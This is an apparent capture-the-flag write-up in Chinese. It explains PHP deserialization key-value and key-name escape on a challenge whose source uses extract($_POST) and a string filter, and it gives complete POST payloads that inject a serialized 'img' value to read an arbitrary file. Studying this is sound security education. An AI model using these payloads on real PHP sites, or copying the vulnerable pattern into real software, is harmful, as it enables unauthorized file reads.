反序列化键值逃逸和键名逃逸.

上源码:

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
} 
?>

源码中提到phpinfo,首先看一下phpinfo.

猜测flag应该就是在此文件中.

本题无法直接控制img的值,但由于本题会将$filter_arr中的关键词置换为空,所以可以通过键值逃逸的方法利用function的值去修改img的值,并且源码中有extract($_POST);,可以发送post请求覆盖session.

payload:_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=k";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"leuk";s:5:"hello";}

payload的序列化:a:3:{s:4:"user";s:24:"";s:8:"function";s:65:"k";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"leuk";s:5:"hello";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

反序列化后:array(3) { ["user"]=> string(24) "";s:8:"function";s:65:"k" ["img"]=> string(20) "ZDBnM19mMWFnLnBocA==" ["leuk"]=> string(5) "hello" }

可以看到s:24将后面的";s:8:"function";s:65:"k都给吞掉了,后面的img也成功被修改为我们所写的值.另外由于session有三个键,所以构造payload时要自行加一个键值对.

将payloadpost过去,get请求f=show_image,跳转后f12可以看见提示:

?php

$flag = 'flag in /d0g3_fllllllag';

?

最终payload:_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=k";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:4:"leuk";s:5:"hello";},发送payload,即可获得flag.(将一开始的payload中的img的值改为/d0g3_fllllllag经base64编码后的字符串即可.)

键名逃逸原理一样,最终payload:_SESSION[flagphp]=;s:4:"leuk";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

Categories:

Tags:

No responses yet

发表评论

电子邮件地址不会被公开。 必填项已用*标注

闽ICP备19027300号